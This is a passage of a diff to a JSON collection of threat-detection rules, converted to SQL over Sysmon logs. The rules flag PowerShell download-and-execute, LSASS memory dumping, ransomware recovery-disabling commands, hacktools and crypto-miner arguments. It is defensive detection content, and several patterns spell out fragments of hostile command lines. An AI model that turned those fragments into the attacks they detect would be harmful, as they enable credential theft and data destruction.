'%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + "filename": "proc_creation_win_reg_volsnap_disable.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", - "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "title": "HackTool - Sliver C2 Implant Activity Pattern", + "id": "42333b2c-b425-441c-b70e-99404a17170f", "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\NetworkProvider%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_new_network_provider.yml" + "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" }, { - "title": "Suspicious File Download Using Office Application", - "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "title": "HackTool - ADCSPwn Execution", + "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", "status": "test", - "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", - "author": "Beyu Denis, oscd.community", + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_office.yml" + "filename": "proc_creation_win_hktl_adcspwn.yml" }, { - "title": "HackTool - UACMe Akagi Execution", - "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "title": "PowerShell Web Download and Execution", + "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "status": "experimental", - "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", - "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Scripts or tools that download files and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (Image LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_uacme.yml" + "filename": "proc_creation_win_powershell_download_iex.yml" }, { - "title": "WannaCry Ransomware Activity", - "id": "41d40bff-377a-43e2-8e1b-2e543069e079", - "status": "test", - "description": "Detects WannaCry ransomware activity", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "title": "ImagingDevices Unusual Parent/Child Processes", + "id": "f11f2808-adb4-46c0-802a-8660db50fa99", + "status": "experimental", + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR Image LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskse.exe' ESCAPE '\\' OR Image LIKE '%\\\\111.exe' ESCAPE '\\' OR Image LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR Image LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR Image LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR Image LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND Image LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_wannacry.yml" + "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" }, { - "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", - "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", - "status": "test", - "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", - "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SecurityXploded Execution", + "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "status": "stable", + "description": "Detects the execution of SecurityXploded Tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Company = 'SecurityXploded' OR Image LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_manage_bde.yml" + "filename": "proc_creation_win_hktl_secutyxploded.yml" }, { - "title": "Potential MSTSC Shadowing Activity", - "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", - "status": "test", - "description": "Detects RDP session hijacking by using MSTSC shadowing", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Modification Of Scheduled Tasks", + "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "status": "experimental", + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" + "filename": "proc_creation_win_schtasks_change.yml" }, { - "title": "HackTool - SharpUp PrivEsc Tool Execution", - "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", - "status": "experimental", - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Non-privileged Usage of Reg or Powershell", + "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "status": "test", + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sharpup.yml" + "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" }, { - "title": "DarkSide Ransomware Pattern", - "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "title": "Suspicious Outlook Child Process", + "id": "208748f7-881d-47ac-a29c-07ea84bf691d", "status": "test", - "description": "Detects DarkSide Ransomware and helpers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious process spawning from an Outlook process.", + "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", "tags": [ "attack.execution", - "attack.t1204" + "attack.t1204.002" ], "falsepositives": [ - "Unknown", - "UAC bypass method used by other malware" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_darkside_ransomware.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" }, { - "title": "Time Travel Debugging Utility Usage", - "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "title": "Winnti Malware HK University Campaign", + "id": "3121461b-5aa0-4a41-b910-66d25524edbb", "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "author": "Florian Roth (Nextron Systems), Markus Neis", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\tttracer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentImage LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND Image LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Test.exe' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND Image LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" }, { - "title": "LSASS Memory Dumping", - "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "status": "test", - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "PUA - CsExec Execution", + "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "status": "experimental", + "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.resource_development", + "attack.t1587.001", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\werfault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" ], - "filename": "proc_creation_win_susp_lsass_dump.yml" + "filename": "proc_creation_win_pua_csexec.yml" }, { - "title": "Exploit for CVE-2015-1641", - "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "title": "Potential Crypto Mining Activity", + "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", "status": "stable", - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "description": "Detects command line parameters or strings often used by crypto miners", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Legitimate use of crypto miners", + "Some build frameworks" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml" + "filename": "proc_creation_win_susp_crypto_mining_monero.yml" }, { - "title": "Renamed BrowserCore.EXE Execution", - "id": "8a4519e8-e64a-40b6-ae85-ba8ad2177559", - "status": "experimental", - "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "status": "test", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1528", - "attack.t1036.003" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'BrowserCore.exe' AND NOT ((Image LIKE '%\\\\BrowserCore.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_browsercore.yml" + "filename": "proc_creation_win_exploit_cve_2017_8759.yml" }, { - "title": "Manage Engine Java Suspicious Sub Process", - "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", - "status": "experimental", - "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", - "author": "Florian Roth (Nextron Systems)", + "title": "Interactive AT Job", + "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", + "status": "test", + "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "tags": [ + "attack.privilege_escalation", + "attack.t1053.002" + ], "falsepositives": [ - "Legitimate sub processes started by Manage Engine ServiceDesk Pro" + "Unlikely (at.exe deprecated as of Windows 8)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\java.exe%' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE 